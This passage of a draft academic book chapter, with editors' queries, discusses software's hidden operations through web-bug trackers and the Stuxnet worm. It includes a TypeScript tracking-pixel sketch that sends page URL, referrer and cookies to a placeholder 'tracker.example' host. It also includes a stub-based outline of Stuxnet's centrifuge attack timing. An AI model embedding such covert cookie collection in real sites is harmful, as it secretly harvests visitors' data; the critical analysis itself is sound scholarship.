&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence, and it has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, and it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
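&lt;br /&gt;
As a rough illustration of how such a tracker operates, the following sketch in TypeScript (the domain 'tracker.example' and the parameter names are invented, not any real vendor's API) shows the basic pattern of a script-driven tracking pixel: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
// Gather what the page freely reveals about the visit...
const params = new URLSearchParams({
  page: location.href,     // the page being read
  ref: document.referrer,  // where the visitor came from
  uid: document.cookie,    // whatever state the tracker set earlier
});

// ...and ship it to the tracker by requesting an invisible 1x1 image.
const bug = new Image(1, 1);
bug.src = 'https://tracker.example/pixel?' + params.toString();
&amp;lt;/pre&amp;gt; &lt;br /&gt;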
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique used to reduce the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor generates $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can, though, see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
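&lt;br /&gt;
Honouring the flag is, for what it is worth, technically trivial, which underlines that the obstacle is political rather than technical. A minimal client-side sketch in TypeScript (navigator.doNotTrack is the real browser property exposing the header's value; the track() function is a hypothetical stand-in): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
// The browser exposes the value of the DNT header it sends ('1' = opt out).
function trackIfPermitted(track: Function): void {
  if (navigator.doNotTrack === '1') {
    return; // a compliant tracker would simply collect nothing
  }
  track(); // otherwise collect as usual
}
&amp;lt;/pre&amp;gt; &lt;br /&gt;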
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; its existence shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data, which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
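&lt;br /&gt;
The attack sequence Zetter describes can be summarised, very speculatively, as a simple timed state machine. The sketch below is written in TypeScript purely for illustration: the real implant was PLC code, and every function here is a stand-in inferred from the account quoted above, not from the Stuxnet binary itself: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
const NOMINAL_HZ = 1064; // the centrifuges' normal operating frequency

// Stand-ins for the real PLC outputs and timers, assumed for illustration.
function setFrequency(hz: number): void { /* drive the frequency converters */ }
function holdForMinutes(minutes: number): void { /* let the speed change bite */ }
function lieDormantForDays(days: number): void { /* do nothing suspicious */ }

// Two alternating steps: a brief over-speed near the rotors' mechanical
// limit, then, 27 days later, a near-stall, and so on.
const steps = [
  { targetHz: 1410, holdMinutes: 15 },
  { targetHz: 2, holdMinutes: 50 },
];

function attackCycle(): void {
  for (const step of steps) {
    setFrequency(step.targetHz);      // push the rotors off nominal speed
    holdForMinutes(step.holdMinutes); // just long enough to fatigue them
    setFrequency(NOMINAL_HZ);         // restore normality before alarms trip
    lieDormantForDays(27);            // wait almost a month between steps
  }
}
&amp;lt;/pre&amp;gt; &lt;br /&gt;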
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the Stuxnet worm is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentence reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 